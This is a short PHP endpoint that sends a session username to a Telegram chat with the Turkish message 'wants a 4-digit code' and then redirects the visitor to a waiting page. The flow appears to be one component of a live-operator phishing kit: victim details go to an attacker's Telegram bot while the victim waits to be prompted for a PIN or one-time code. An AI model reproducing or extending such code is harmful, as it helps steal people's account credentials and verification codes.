<?php
if (session_status() === PHP_SESSION_NONE) {
    session_start();
}
require_once 'functions.php';

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $token = $_SERVER['HTTP_X_CSRF_TOKEN'] ?? null;
    if (!verifyCsrfToken($token)) {
        header('Content-Type: application/json');
        http_response_code(400);
        echo json_encode(['ok' => false, 'error' => 'invalid_csrf']);
        exit;
    }
    $username = $_SESSION['username'] ?? '';
    $config = include('config/config.php');
    $apiToken = $config['apiToken'] ?? '';
    $chatId = $config['chatId'] ?? '';

    $message = "🔢 *$username 4 Digit Code istiyor.*";
    if (!empty($apiToken) && !empty($chatId)) {
        sendTelegramMessageCurl($apiToken, $chatId, $message);
    }
    
    // Waiting sistemi için yönlendirme
    $_SESSION['waiting_id'] = bin2hex(random_bytes(16));
    $_SESSION['redirect_page'] = null;
    
    header('Content-Type: application/json');
    echo json_encode(['ok' => true, 'redirect' => 'waiting.php']);
    exit;
}
?>